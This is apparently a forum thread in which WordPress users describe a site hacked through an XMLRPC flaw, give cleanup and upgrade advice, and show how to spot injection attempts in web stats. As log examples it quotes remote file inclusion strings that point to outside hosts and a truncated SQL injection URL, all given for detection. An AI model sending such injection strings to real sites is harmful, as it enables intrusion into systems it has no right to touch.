I noticed in Google one of my undernourished WordPress sites had the message “This site may harm your computer” under its listing. On checking I found it had been hacked and a hidden “iframe” had been included on two posts which ran out through a Chinese server and called a script called “wp-stats”. Turns out this is a hack done through a dodgy XMLRPC function in WordPress 2.2 and may also affect WordPress 2.5.
I upgraded to 2.6 which fixes the loophole, but you still need to remove the offending code by editing each affected post. If you don’t wan to upgrade, you can also disable the attack it by removing the offending code from whatever posts its in, stopping people commenting on posts and removing any users that have been registerd (apart from your own) in admin.
Worth checking if you run WordPress.
If you have the “harm” message in Google, you need to use Webmaster Tools to ask for the site to be reviewed again after you have tidied up the posts.
Cheers
Simmo!
It is advised to keep your CMS up-to-date all the time, but the first place I would see around in your vhost config, and make sure the register globals php flag is turned off. So noone can execute anything nasty just by injecting your php files with executable SERVER[DOCUMENT_ROOT] commands.
Check your webstats and look for rows like this in the pages your visitors seen list:
DOCUMENT_ROOT=http://artemcity.ru/r0x.txt??
?_SERVER[DOCUMENT_ROOT]=http://http://www.topyn.com/ips.txt?
An injection attempt will look something like those above.
xxxhttp://www.{blogsitename}.com/?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x44454…
It is a very long URL, but the purpose is to do something to WP. I’ve read up a bit and know it’s a hacking attempt, but I think it only works on older versions of WP. I tried it on my sites and nothing happened at all. I upgraded them to the latest version of WP anyway.
So – UPGRADE YOUR WORDPRESS BLOGS NOW!
Please login or Register to submit your answer